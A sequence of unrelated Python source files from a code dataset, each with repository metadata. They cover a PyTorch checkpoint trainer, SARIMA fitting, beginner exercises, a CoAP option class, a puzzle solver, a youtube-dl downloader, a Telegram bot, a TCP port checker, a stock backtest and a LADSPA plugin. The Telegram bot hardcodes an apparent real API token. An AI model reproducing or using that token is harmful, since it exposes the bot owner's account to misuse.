@abstractmethod\n    def evaluate(self, loader=None):\n        \"\"\"\n        Evaluate the model on the val_loader given at initialization\n\n        :param loader: A Dataloader to be used for evaluation. If not given, it will use the \n        self._eval_loader that's set during initialization..\n        :return: A dict that contains metric(s) information for validation set\n        \"\"\"\n        raise NotImplementedError\n    \n    def save_model(self, path=None):\n        \"\"\"\n        Saves only the model parameters.\n        : param path: path to save model (including filename.)\n        \"\"\"\n        self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n        torch.save(self.model.state_dict(), path)\n        self.logger.info(\"Checkpoint saved.\")\n    \n    def load_model(self, path=None):\n        \"\"\"\n        Loads model params from the given path.\n        : param path: path to save model (including filename.)\n        \"\"\"\n        self.logger.info(\"Loading checkpoint: {} ...\".format(path))\n        self.model.load_state_dict(torch.load(path))\n        self.logger.info(\"Checkpoint loaded.\")\n\n\n    def save_checkpoint(self, path=None):\n        \"\"\"\n        Saving TRAINING checkpoint. 
Including the model params and other training stats\n        (optimizer, current epoch, etc.)\n\n        :param path: path to save the checkpoint to (including filename.)\n        \"\"\"\n        arch = type(self.model).__name__\n        state = {\n            'arch': arch,\n            'epoch': self.current_epoch,\n            'model': self.model.state_dict(),\n            'optimizer': self.optimizer.state_dict(),\n            'lr_scheduler': self.lr_scheduler.state_dict(),\n            'monitor_best': self.monitor_best,\n            'config': self.config\n        }\n        torch.save(state, path)\n        self.logger.info(\"Saving checkpoint: {} ...\".format(path))\n\n\n    def resume_checkpoint(self, resume_path=None):\n        \"\"\"\n        Loads TRAINING checkpoint. Including the model params and other training stats\n        (optimizer, current epoch, etc.)\n\n        :param resume_path: Checkpoint path to be resumed\n        \"\"\"\n        resume_path = str(resume_path)\n        self.logger.info(\"Loading checkpoint: {} ...\".format(resume_path))\n        checkpoint = torch.load(resume_path)\n        self.start_epoch = checkpoint['epoch'] + 1\n        self.monitor_best = checkpoint['monitor_best']\n\n        # load architecture params from checkpoint.\n        if checkpoint['config']['arch'] != self.config['arch']:\n            self.logger.warning(\"Warning: Architecture configuration given in config file is different from that of \"\n                                \"checkpoint. This may yield an exception while state_dict is being loaded.\")\n        missing_keys, unexpected_keys = self.model.load_state_dict(checkpoint['model'], strict=False)\n        if len(missing_keys) > 0:\n            self.logger.warning(f\"[WARNING] missing keys: {missing_keys}\")\n        if len(unexpected_keys) > 0:\n            self.logger.warning(f\"[WARNING] unexpected keys: {unexpected_keys}\")\n\n        # load optimizer state from checkpoint only when optimizer type is not changed.\n        if checkpoint['config']['optimizer']['type'] != self.config['optimizer']['type']:\n            self.logger.warning(\"Warning: Optimizer type given in config file is different from that of checkpoint. \"\n                                \"Optimizer parameters not being resumed.\")\n        else:\n            self.optimizer.load_state_dict(checkpoint['optimizer'])\n\n        # load lr_scheduler state from checkpoint only when lr_scheduler type is not changed.\n        if checkpoint['config']['lr_scheduler']['type'] != self.config['lr_scheduler']['type']:\n            self.logger.warning(\"Warning: lr_scheduler type given in config file is different from that of checkpoint. \"\n                                \"lr_scheduler parameters not being resumed.\")\n        else:\n            self.lr_scheduler.load_state_dict(checkpoint['lr_scheduler'])\n\n        self.logger.info(\"Checkpoint loaded. 
Resume training from epoch {}\".format(self.start_epoch))\n","repo_name":"mohammadasim98/human-pose-prediction-in-the-wild","sub_path":"src/trainers/base3d.py","file_name":"base3d.py","file_ext":"py","file_size_in_byte":13943,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"2602029529","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sympy import poly\nfrom sympy.abc import B, a, b, c, d\nfrom scipy.optimize import minimize, basinhopping, brute, least_squares\n\nfrom sarima_plus_plus import sampleSeasonalARIMA, calculateSeasonalARIMA_error, \\\n    calculateSeasonalARIMA_error_minimization_form_slow, \\\n    SARIMA_error_squared, difference_series\n\nif __name__ == '__main__':\n    p_poly = None\n    q_poly = poly(1 - a * B, B) * poly(1 - b * B ** 4, B) * poly(1 - c * B ** 30, B)\n    d_poly = poly(1 - B, B)\n\n    q_symbols = [a, b, c]\n    q_ARIMA_coeffs = [0.6, 0.2, 0.1]\n    est_p_poly = None\n    est_q_poly: poly = poly(q_poly.subs(dict(zip(q_symbols, q_ARIMA_coeffs))), B)\n\n    y_t = sampleSeasonalARIMA(est_p_poly, d_poly, est_q_poly, 1, 1000)\n    plt.plot(y_t, label=\"sampled ARIMA\", marker='x')\n\n    a_t_error = calculateSeasonalARIMA_error(y_t, est_p_poly, d_poly, est_q_poly)\n    plt.plot(a_t_error, label='sampled ARIMA error', marker='.', markevery=10)\n\n    print(\"est_q_poly\", est_q_poly)\n    print(\"Expected value of shock a_t\", np.mean(a_t_error))\n    print(\"sd of shock a_t\", np.sqrt(np.var(a_t_error)))\n    # remember: don't square error to determine the sd of a_t\n\n    plt.legend()\n    plt.show()\n    ###################################################################\n\n    myx0 = np.random.random(len(q_ARIMA_coeffs))\n    myx0 /= np.sum(myx0)\n\n    w_t = difference_series(y_t, d_poly)\n\n    res = minimize(SARIMA_error_squared, x0=myx0,\n                   args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n                   method='Nelder-Mead', options={'maxiter': 5000, 'disp': True})\n    print(\"estimated params (via minimize):\", res.x)\n    print(\"true params:\", q_ARIMA_coeffs)\n    print(\"initial guess:\", myx0)\n\n    # warn: lm method does not allow bounds, therefore good initial guess is needed (?) (i.e. 
satisfying conditions like invertibility)\n    res = least_squares(calculateSeasonalARIMA_error_minimization_form_slow, bounds=(-2, 2), x0=myx0,\n                        args=(w_t, p_poly, q_poly, [], q_symbols, 0, len(q_ARIMA_coeffs)),\n                        )\n    print(\"estimated params (via least_squares):\", res.x)\n    print(\"true params:\", q_ARIMA_coeffs)\n    print(\"initial guess:\", myx0)\n","repo_name":"Irfan-Mu3/ai-ds-projects","sub_path":"time_series_analysis/time_series_funcs/spp_MA_test.py","file_name":"spp_MA_test.py","file_ext":"py","file_size_in_byte":2261,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"39314756962","text":"# input\nname = str(input(\"Enter last name: \"))\ndependents = int(input(\"Enter the number of dependents: \"))\ngrossIncome = float(input(\"Enter gross income: $\"))\nagi = grossIncome-dependents*12000\n\n# process phase\nif agi > 50000:\n    itr = 0.20\nelse:\n    itr = 0.10\nincomeTax = agi*itr\nif incomeTax < 0:\n    incomeTax = 100\n\n# output\nprint(name)\nprint(\"Gross income: $\", grossIncome)\nprint(\"Number of dependents: \", dependents)\nprint(\"Adjusted gross income: $\", agi)\nprint(\"Income tax: \", incomeTax)","repo_name":"katieserg/CIS106-Katie-Sergiyenko","sub_path":"PS3P5.py","file_name":"PS3P5.py","file_ext":"py","file_size_in_byte":513,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"12486999604","text":"import sys\nread = sys.stdin.readline\n\nn = int(read())\n\nif n <= 2 :\n    print(n)\n    exit()\n\ndp1 = [0, 1]\ndp2 = [1, 1]\n\nfor i in range(2, n) :\n    c = []\n    c.append(dp2[1]%15746)\n    c.append((dp1[1]+dp2[1])%15746)\n    #print(c)\n    dp1 = dp2\n    dp2 = c\n\nprint(sum(c)%15746)\n","repo_name":"HyunJungJo98/Algorithm-Study","sub_path":"DP/1904 - 01타일.py","file_name":"1904 - 01타일.py","file_ext":"py","file_size_in_byte":277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"}
+{"seq_id":"9655189","text":"from coapthon import defines\nfrom coapthon.utils import byte_len\n\n__author__ = 'Giacomo Tanganelli'\n\n\nclass Option(object):\n    \"\"\"\n    Class to handle the CoAP Options.\n    \"\"\"\n    def __init__(self):\n        \"\"\"\n        Data structure to store options.\n        \"\"\"\n        self._number = None\n        self._value = None\n\n    @property\n    def number(self):\n        \"\"\"\n        Return the number of the option.\n\n        :return: the option number\n        \"\"\"\n        return self._number\n\n    @number.setter\n    def number(self, value):\n        \"\"\"\n        Set the option number.\n\n        :type value: int\n        :param value: the option number\n        \"\"\"\n        self._number = value\n\n    @property\n    def value(self):\n        \"\"\"\n        Return the option value.\n\n        :return: the option value in the correct format depending on the option\n        \"\"\"\n        if self._value is None:\n            self._value = bytearray()\n        opt_type = defines.OptionRegistry.LIST[self._number].value_type\n        if opt_type == defines.INTEGER:\n            if byte_len(self._value) > 0:\n                return int(self._value)\n            else:\n                return defines.OptionRegistry.LIST[self._number].default\n        return self._value\n\n    @value.setter\n    def value(self, value):\n        \"\"\"\n        Set the value of the option.\n\n        :param value: the option value\n        \"\"\"\n        if type(value) is str:\n            value = bytearray(value, \"utf-8\")\n        elif type(value) is int and byte_len(value) != 0:\n            value = value\n        elif type(value) is int and byte_len(value) == 0:\n            value = 0\n        self._value = value\n\n    @property\n    def length(self):\n        \"\"\"\n        Return the value length\n\n        :rtype : int\n        \"\"\"\n        if isinstance(self._value, int):\n            return 
byte_len(self._value)\n if self._value is None:\n return 0\n return len(self._value)\n\n def is_safe(self):\n \"\"\"\n Check if the option is safe.\n\n :rtype : bool\n :return: True, if option is safe\n \"\"\"\n if self._number == defines.OptionRegistry.URI_HOST.number \\\n or self._number == defines.OptionRegistry.URI_PORT.number \\\n or self._number == defines.OptionRegistry.URI_PATH.number \\\n or self._number == defines.OptionRegistry.MAX_AGE.number \\\n or self._number == defines.OptionRegistry.URI_QUERY.number \\\n or self._number == defines.OptionRegistry.PROXY_URI.number \\\n or self._number == defines.OptionRegistry.PROXY_SCHEME.number:\n return False\n return True\n\n @property\n def name(self):\n \"\"\"\n Return option name.\n\n :rtype : String\n :return: the option name\n \"\"\"\n return defines.OptionRegistry.LIST[self._number].name\n\n def __str__(self):\n \"\"\"\n Return a string representing the option\n\n :rtype : String\n :return: a message with the option name and the value\n \"\"\"\n return self.name + \": \" + str(self.value) + \"\\n\"\n\n def __eq__(self, other):\n \"\"\"\n Return True if two option are equal\n\n :type other: Option\n :param other: the option to be compared against\n :rtype : Boolean\n :return: True, if option are equal\n \"\"\"\n return self.__dict__ == other.__dict__\n","repo_name":"Tanganelli/CoAPthon","sub_path":"coapthon/messages/option.py","file_name":"option.py","file_ext":"py","file_size_in_byte":3415,"program_lang":"python","lang":"en","doc_type":"code","stars":216,"dataset":"github-code","pt":"32"} +{"seq_id":"43360385154","text":"\n#This program calculate the numbers of students with while loop\n\n#the main function\ndef main():\n endProgram, totalScore, averageScores, score, number, counter = declareVariable()\n\n while endProgram == \"no\":\n declareVariable()\n number = getNumber()\n totalScore = getScores(number,totalScore)\n averageScores = getAverage(totalScore, number)\n printAverage(averageScores)\n endProgram = input(\"Do you want to end the program?(Enter no to process a new set of test score)\")\n\ndef declareVariable():\n endProgram = \"no\"\n totalScore = 0.0\n averageScores = 0.0\n score = 0\n number = 0\n counter = 1\n return endProgram, totalScore, averageScores, score, number, counter\n\ndef getNumber():\n number = int(input(\"How many students took the test\"))\n return number\n\ndef getScores(number,totalScore):\n counter = 1\n while counter <= number:\n score = int(input(\"Enter the score\"))\n totalScore += score\n counter += 1\n return totalScore\n\ndef getAverage(totalScore, number):\n averageScore = totalScore/number\n return averageScore\n\ndef printAverage(averageScores):\n print(\"The average Score is \", averageScores)\n#calls main\nmain()\n","repo_name":"ssd2192/Python","sub_path":"Total Students with While Loop.py","file_name":"Total Students with While Loop.py","file_ext":"py","file_size_in_byte":1219,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"31744889754","text":"# Write a program that asks the user to enter an integer and prints two integers, root\n# and pwr, such that 0 < pwr < 6 and root**pwr is equal to the integer entered by the user. 
If no\n# such pair of integers exists, it should print a message to that effect.\n\n\nimport math\n\n\n\nnum = int(input(\"Enter an integer: \"))\nfound = False\n\n#set 0 < power < 6\nfor pwr in range(1,6):\n #find the integer candidate for the pwr-th root\n root = round(num**(1/pwr))\n #compare if root**power == num entered\n if root**pwr == num:\n found = True\n #if True print(root, power)\n print(f\"root = {root} and power = {pwr}\")\n print(f\"{root}^{pwr} = {num}\")\n\nif not found:\n print(\"No such pair of integers exists.\")\n\n###WHILE LOOP VERSION\n\n# num = int(input(\"Enter an integer: \"))\n# found = False\n# pwr = 2\n\n# while pwr < 6:\n# root = round(num**(1/pwr))\n# if root**pwr == num:\n# found = True\n# print(f\"{root}^{pwr} = {num}\")\n# pwr += 1\n\n# if not found:\n# print(\"No such pair of integers exists.\")\n\n\n","repo_name":"ShadrackAdom/Data-Science-SelfTaught-Learning-Path","sub_path":"OSSU/MIT-Intro-to-CS-Python/FingerExercise/rootpwr.py","file_name":"rootpwr.py","file_ext":"py","file_size_in_byte":1062,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"21338834568","text":"from __future__ import unicode_literals\nimport youtube_dl\n\"\"\"\n# Download the video only\ntimes = int(input('Enter the number of videos to download:'))\nfor i in range(times):\n ydl_opts = {}\n ys_url = input(f'URL of video #{i+1} to download:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([ys_url])\n\"\"\"\n\n# Download only the audio track of the video\n\nydl_opts = {\n 'format': 'bestaudio/best',\n 'postprocessors': [{\n 'key': 'FFmpegExtractAudio',\n 'preferredcodec': 'mp3',\n 'preferredquality': '192',\n }],\n}\n\ntimes = int(input('Enter the number of audio tracks to download:'))\nfor i in range(times):\n y_url = input(f'URL of video #{i+1} whose audio should be downloaded:')\n with youtube_dl.YoutubeDL(ydl_opts) as ydl:\n ydl.download([y_url])\n","repo_name":"getcoden/python-practise","sub_path":"10 有趣的脚本小程序/Download视频及youtube视频中仅下载音频.py","file_name":"Download视频及youtube视频中仅下载音频.py","file_ext":"py","file_size_in_byte":750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23427646474","text":"from telegram import Update, KeyboardButton, ReplyKeyboardMarkup, ReplyKeyboardRemove\nfrom telegram.ext import Updater, CommandHandler, CallbackContext, MessageHandler, Filters, ConversationHandler\n\n\ndef start(updater: Update, context: CallbackContext): # this handler must always be present\n updater.message.reply_text(\"Assalomu alakum \\n\\nIsmingizni kirting: ✍️\") # sends this text straight to the chat\n # updater.message.text # captures the message a user sends to the bot\n return 2\n\n\ndef name(updater: Update, context: CallbackContext):\n name_my = updater.message.text\n updater.message.reply_text(\"Familiyangizni kiriting: ✍️\")\n\n return 3\n\n\ndef fname(updater: Update, context: CallbackContext):\n fname_my = updater.message.text\n updater.message.reply_text(\"Yoshingizni kiriting ✍️\")\n\n return 4\n\ndef danni(updater: Update, context: CallbackContext):\n danni_my = updater.message.text\n updater.message.reply_text(f\"Quyidagi ma'lumotlar tog'rimi?\\nISM:{start}\\nFAMILIYA:{name}\\nYOSH:{fname}\")\n return 5\n\ndef age(updater: Update, context: CallbackContext):\n go_to = [ # variable holding the keyboard button\n [KeyboardButton(\"⬅️Oldinga\")]\n # KeyboardButton renders a button; the text passed in () becomes the button label\n ]\n # ReplyKeyboardMarkup -- turns the keyboard variable into a reply markup\n # resize_keyboard = True -- shrinks the buttons to fit\n 
updater.message.reply_text(\"Keyingi bo'limga o'tilsinmi?\",\n reply_markup=ReplyKeyboardMarkup(go_to, resize_keyboard=True))\n age_my = updater.message.text\n\n return 6\n\n\ndef menu(updater: Update, context: CallbackContext):\n info_button = [\n [KeyboardButton(\"🍴 Menyu\")],\n [KeyboardButton(\"🛍 Mening buyurtmalarim\")],\n [KeyboardButton(\"✍️ Fikr bildirish\"), KeyboardButton(\"⚙️ Sozlamalar\")]\n ]\n updater.message.reply_text(\"Quydagilardan birini tanlang..\",\n reply_markup=ReplyKeyboardMarkup(info_button, resize_keyboard=True))\n\n return 1\n\n\ndef post_message(updater: Update, context: CallbackContext):\n button_end = [\n [KeyboardButton(\"⬅️ Ortga\")]\n ]\n msg = updater.message.text\n updater.message.reply_text(f\"{msg} buyrug'i bosildi\", reply_markup=ReplyKeyboardMarkup(button_end, resize_keyboard=True))\n\n return 7\n\n # return 2\n # updater.message.reply_text(f\"{msg} bo'limiga\")\n\n\ndef main():\n TOKENT = \"5132329633:AAGFHeFtlyJR4iHeWID7D7CloKzx4xO3AOQ\"\n\n updater = Updater(TOKENT)\n\n all_handler = ConversationHandler(\n entry_points=[CommandHandler(\"start\", start)],\n states={\n 1: [MessageHandler(Filters.text, post_message)],\n 2: [MessageHandler(Filters.text, name)],\n 3: [MessageHandler(Filters.text, fname)],\n 4: [MessageHandler(Filters.text, age)],\n 5: [MessageHandler(Filters.text, menu)], # bu def ni bajarish tartibi\n\n },\n fallbacks=[]\n )\n updater.dispatcher.add_handler(all_handler)\n updater.start_polling()\n updater.idle()\n\n\nif __name__ == \"__main__\":\n main()","repo_name":"richkhandev/rasm.jpg","sub_path":"Bot_3.py","file_name":"Bot_3.py","file_ext":"py","file_size_in_byte":3163,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"74058576090","text":"from puzzler.puzzles import polyominoes\nfrom puzzler.puzzles.polyominoes import (\n Polyominoes123456, OneSidedPolyominoes123456)\n\n\nclass Polyominoes123456Star(Polyominoes123456):\n\n \"\"\"\n Monomono, domino, & triominoes restricted to a central 3x3 square.\n\n Pentominoes & tetrominoes restricted to the middle ring, as per\n Polyominoes12345Diamond2.\n\n Hexominoes restricted to an outer ring.\n\n 4,579 unique solutions for the pentominoes & tetrominoes (outer ring).\n 6 unique solutions for the inner square.\n 8 relative orientations.\n Total unique solutions: 219,792.\n\n many solutions\n\n Design by `Jack Wetterer and Chris Patterson, with symmetry refinements by\n Darian Jenkins `__, extending Kadon's\n 'Poly-5' (gamepuzzles.com/polycub2.htm#P5).\n \"\"\"\n\n width = 27\n height = 29\n\n def coordinates(self):\n self.inner_square_coords = set(\n self.coordinates_rectangle(3, 3, offset=(12,13)))\n coords_5 = set(\n list(self.coordinates_diamond(7, offset=(7,8)))\n + list(self.coordinates_rectangle(15, 1, offset=(6, 14)))\n + list(self.coordinates_rectangle(1, 15, offset=(13, 7))))\n self.middle_ring_coords = coords_5 - set(self.inner_square_coords)\n coords_6 = set(\n list(self.coordinates_rectangle(27, 1, offset=(0, 14)))\n + list(self.coordinates_rectangle(1, 29, offset=(13, 0))))\n for i in range(6):\n coords_6.update(set(self.coordinates_rectangle(\n 23 - 4 * i, 3 + 4 * i, offset=(2 * i + 2, 13 - 2 * i))))\n self.outer_ring_coords = coords_6 - coords_5\n return sorted(coords_6)\n\n def customize_piece_data(self):\n self.piece_data['P06'][-1]['rotations'] = None\n self.piece_data['P06'][-1]['flips'] = None\n\n fixed_inner_pieces = True\n\n if fixed_inner_pieces:\n\n restrictions = {\n #name: [(aspect, offset), ...],\n 'O1': 
[(0, (13, 14))],\n 'I2': [(1, (13, 15))],\n 'I3': [(0, (12, 13))],\n 'V3': [(2, (13, 13))],\n 'I4': [(1, ( 6, 14))],\n 'L4': [(1, (13, 7))],\n 'O4': [(0, (16, 12))],\n 'T4': [(2, (11, 17))],\n 'Z4': [(1, ( 9, 16))],\n 'F': [(5, (11, 9))],\n 'I': [(0, (13, 17))],\n 'L': [(3, (11, 15))],\n 'N': [(6, ( 8, 14))],\n 'P': [(0, (14, 17))],\n 'T': [(0, (18, 13))],\n 'U': [(1, (15, 14))],\n 'V': [(3, (12, 10))],\n 'W': [(3, ( 8, 11))],\n 'X': [(0, (15, 15,))],\n 'Y': [(0, (15, 10))],\n 'Z': [(3, (10, 11))],\n }\n\n def build_matrix(self):\n self.build_restricted_matrix()\n\n else:\n\n def build_matrix(self):\n self.build_regular_matrix(\n (polyominoes.Monomino.piece_data.keys()\n + polyominoes.Domino.piece_data.keys()\n + sorted(polyominoes.Trominoes.piece_data.keys())),\n sorted(self.inner_square_coords))\n self.build_regular_matrix(\n (sorted(polyominoes.Tetrominoes.piece_data.keys())\n + sorted(polyominoes.Pentominoes.piece_data.keys())),\n sorted(self.middle_ring_coords))\n self.build_regular_matrix(\n sorted(polyominoes.Hexominoes.piece_data.keys()),\n sorted(self.outer_ring_coords))\n\n\nclass Polyominoes123456_23x13(Polyominoes123456):\n\n width = 23\n height = 13\n","repo_name":"bpasanek/puzzlecode","sub_path":"puzzler-tweaked/puzzler/puzzles/polyominoes123456.py","file_name":"polyominoes123456.py","file_ext":"py","file_size_in_byte":3573,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"32"} +{"seq_id":"40065589768","text":"import numpy as np\nimport pandas as pd\n\nimport matplotlib.pyplot as plt\n\ndef load_data(file_name):\n df = pd.read_csv(file_name)\n return df\n\ndef buy_n_sell(true_prices, pred_prices, balance=1000000):\n\n num_share = 0\n portfolio_values = list()\n\n long_pos = 1 # 1 long ; 0 short\n long_price = true_prices[0] # assume holding the stock at the beginning\n\n profits = list() # daily profit\n\n num_share = balance//long_price\n balance = balance-num_share*long_price\n\n for i in range(len(pred_prices)-1):\n if i == len(pred_prices)-2 and long_pos == 1:\n if pred_prices[i+1] >= true_prices[i]:\n profits.append(true_prices[i+1]-long_price) # sell on last day\n long_pos = 0\n balance = balance + true_prices[i + 1] * num_share\n portfolio_values.append(balance) # 2nd last day\n portfolio_values.append(balance) # last day\n num_share = 0\n break\n else: # i == len(pred_prices)-2 and pred_prices[i+1] < true_prices[i] and long_pos == 1:\n profits.append(true_prices[i]-long_price) # sell on the 2nd last day\n long_pos = 0\n balance = balance + num_share*true_prices[i]\n portfolio_values.append(balance)\n portfolio_values.append(balance)\n num_share = 0\n break\n if high_return(true_prices[i], pred_prices[i+1]) and long_pos == 0:\n long_pos = 1\n profits.append(0)\n long_price = true_prices[i]\n portfolio_values.append(balance)\n num_share = balance//long_price\n balance = balance-num_share*long_price\n elif high_return(true_prices[i], pred_prices[i+1]) != True and long_pos == 1:\n long_pos = 0\n profits.append(true_prices[i]-long_price)\n balance = balance + num_share*true_prices[i]\n num_share = 0\n portfolio_values.append(balance)\n elif low_return(true_prices[i], pred_prices[i+1]) and long_pos == 1:\n long_pos = 0\n balance += num_share*true_prices[i]\n portfolio_values.append(balance)\n num_share=0\n else:\n profits.append(0)\n portfolio_values.append(balance+num_share*true_prices[i])\n continue\n return portfolio_values\n\n\n\ndef high_return(true_price, pred_price):\n return pred_price >= true_price * 1.02 > 0 # if 
predicted price is 2% higher than current price\n\n\ndef low_return(true_price, pred_price):\n return true_price * 0.99 >= pred_price > 0\n\n\nfile_name = 'return_df.csv'\ndf = load_data(file_name)\n\ntrue_prices, pred_prices = df['true_prices'], df['pred_prices']\nbalance = 1000000\nportfolio_values = buy_n_sell(true_prices, pred_prices,balance)\nportfolio_values = [elem/balance for elem in portfolio_values]\ntrue_pct_change = [x/true_prices[0] for x in true_prices]\n\n# plotting\nplt.plot(true_pct_change, label=\"buy and hold\")\nplt.plot(portfolio_values, label='strategy')\nplt.legend()\nplt.show()\n\ntrue_returns = np.diff(true_prices)\npred_returns = np.diff(pred_prices)\nax= plt.figure()\nplt.plot(true_returns, label='true')\nplt.plot(pred_returns, label='predicted')\nplt.show()","repo_name":"ysong126/previous_repo","sub_path":"Time series LSTM/strategy_backtest.py","file_name":"strategy_backtest.py","file_ext":"py","file_size_in_byte":3265,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"13402656694","text":"#Task 9_1\nn=0\nnl=0\nf=0\nwhile n<1 or n>100000:\n n=int(input())\nwhile nl>n or nl<1 or f==1:\n f=0\n print(f\"Vvedite cherz probel {n} chisel.\")\n l=list(map(int,input().split()))\n nl=len(l)\n l.sort()\n if len(l) > 0:\n if l[-1] > 2*10e9 or l[0] < -2*10e9:\n f=1\ntl = set(l)\nprint(len(tl))\n\n##Task 9_2\ntmp1 = set()\ntmp2 = set()\ntmp3 = set()\nprint(f\"Vvedite kol-vo tmp1 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp1\")\nfor i in range(n):\n tmp1.add(int(input()))\nprint(f\"Vvedite kol-vo tmp2 <100000.\")\nn=0\nwhile n<1 or n>=100000:\n n=int(input())\nprint(f\"Vvedite tmp2\")\nfor i in range(n):\n tmp2.add(int(input()))\ntmp3=tmp2.intersection(tmp1)\nprint(len(tmp3))\n\n##Task 9_3\ntmp=set()\nl=list(map(int,input().split()))\nfor i in l:\n if i in tmp:\n print(f\"{i} YES\")\n else:\n print(f\"{i} NO\")\n tmp.add(i)","repo_name":"IgorKirilyuk/Python1","sub_path":"PythonApplication1/PythonApplication1/lesson_9.py","file_name":"lesson_9.py","file_ext":"py","file_size_in_byte":889,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"30077073517","text":"\"\"\"\r\n\n\nWrite a function that returns the most frequent character in a list of words.\n\n### Examples\n\n most_frequent_char([\"apple\", \"bandage\", \"yodel\", \"make\"])\n ➞ [\"a\", \"e\"]\n \n most_frequent_char([\"music\", \"madness\", \"maniac\", \"motion\"])\n ➞ [\"m\"]\n \n most_frequent_char([\"the\", \"hills\", \"are\", \"alive\", \"with\", \"the\", \"sound\", \"of\", \"music\"])\n ➞ [\"e\", \"h\", \"i\"]\n\n### Notes\n\n * If multiple characters tie for most frequent, list all of them in alphabetical order.\n * Words will be in lower case.\n\n\"\"\"\r\n\ndef most_frequent_char(lst):\n x = ''.join(lst)\n y = [x.count(i) for i in x]\n z = []\n for i in range(len(x)):\n if max(y) == y[i]:\n z.append(x[i])\n return sorted(list(set(z)))\n\n","repo_name":"daniel-reich/turbo-robot","sub_path":"KcD3bABvuryCfZAYv_10.py","file_name":"KcD3bABvuryCfZAYv_10.py","file_ext":"py","file_size_in_byte":720,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"23429131438","text":"#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n__author__ = 'Yang'\n\nimport socket\nimport time\nimport json\nimport threadpool\n\nhostname=socket.gethostname()\n\nEntry = {\n \"Endpoint\": hostname,\n \"Timestamp\": int(time.time()),\n 
\"Step\": 60,\n }\n\n#端口超时时间默认设置为5秒\ndef check_tcp_port(kw, timeout=5):\n try:\n cs = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n address = (str(kw[\"host\"]), int(kw[\"port\"]))\n cs.settimeout(timeout)\n status = cs.connect_ex(address)\n cs.close()\n except Exception as e:\n return {\"status\": False, \"message\": str(e)}\n else:\n if status != 0:\n return {\"status\": False, \"message\": \"Connection %s:%s failed\" % (kw[\"host\"], kw[\"port\"])}\n else:\n return {\"status\": True, \"message\": \"OK\"}\n\ndef run_check(entry_list,host,port,metric_type):\n kw={\"host\": host,\"port\": port}\n status=check_tcp_port(kw=kw)\n if status['status'] == True:\n value=1\n else:\n value=0\n entry = Entry.copy()\n entry.update({\n \"CounterType\": \"GAUGE\",\n \"Metric\": \"tcp.status\",\n \"TAGS\": \"type={0},port={1}\".format(host,port),\n \"Value\": value\n })\n entry_list.append(entry)\n\ndef run_threadpool():\n args=[]\n #线程池预设为8,可以根据机器性能修改\n task_pool=threadpool.ThreadPool(8)\n for service in service_list:\n for host in service['ip']:\n args.append(([entry_list,host,service[\"port\"],service[\"name\"]],None))\n \n theads=threadpool.makeRequests(run_check,args)\n [task_pool.putRequest(req) for req in theads ]\n task_pool.wait()\n \n\nif __name__ == '__main__':\n entry_list = []\n service_list=[]\n #添加服务就按照下面的例子给service_list添加一个dict,\n service_list.append({ \n \"name\": \"zookeeper\" ,\n \"ip\": [\"192.168.1.100\",\"192.168.1.101\",\"192.168.1.102\"],\n \"port\": \"2181\"\n })\n \n service_list.append({\n \"name\": \"rabbitmq\" ,\n \"ip\": [\"192.168.1.103\",\"192.168.1.104\",\"192.168.1.105\"],\n \"port\": \"5672\"\n })\n\n run_threadpool()\n print(json.dumps(entry_list))\n","repo_name":"84372051/n9e_plugin","sub_path":"60_tcp-connect.py","file_name":"60_tcp-connect.py","file_ext":"py","file_size_in_byte":2268,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"32"} +{"seq_id":"11677492350","text":"from ..processor import Processor\nfrom ..mfp_app import MFPApp\nfrom ..bang import Uninit\n\n\nclass Plugin(Processor):\n doc_tooltip_obj = \"LADSPA plugin host\"\n\n def __init__(self, init_type, init_args, patch, scope, name):\n initargs, kwargs = patch.parse_args(init_args)\n\n self.lib_name = None\n self.lib_index = None\n self.plug_info = None\n self.plug_name = None\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.dsp_inlets = []\n self.dsp_outlets = []\n self.inlet_map = {}\n\n if len(initargs):\n self.init_plugin(initargs[0])\n\n Processor.__init__(self, self.plug_inlets, self.plug_outlets, init_type, init_args,\n patch, scope, name)\n self.hot_inlets = list(range(self.plug_inlets))\n\n async def setup(self):\n await self.dsp_init(\n \"ladspa~\",\n lib_name=self.lib_name, lib_index=self.lib_index,\n plug_control=self.plug_control\n )\n\n def init_plugin(self, pname):\n\n pinfo = MFPApp().pluginfo.find(pname)\n self.plug_info = pinfo\n self.lib_name = pinfo.get(\"lib_name\")\n self.lib_index = pinfo.get(\"lib_index\")\n self.plug_name = pinfo.get(\"label\")\n self.plug_inlets = 0\n self.plug_outlets = 0\n self.plug_control = []\n self.inlet_map = {}\n\n self.doc_tooltip_obj = (\n MFPApp().pluginfo.plugin_docstring(pinfo) or self.doc_tooltip_obj)\n self.doc_tooltip_inlet = []\n self.doc_tooltip_outlet = []\n\n portinfo = pinfo.get(\"ports\", [])\n\n for portnum, port in enumerate(portinfo):\n self.plug_control.append(0)\n d = port.get(\"descriptor\", 0)\n if d & 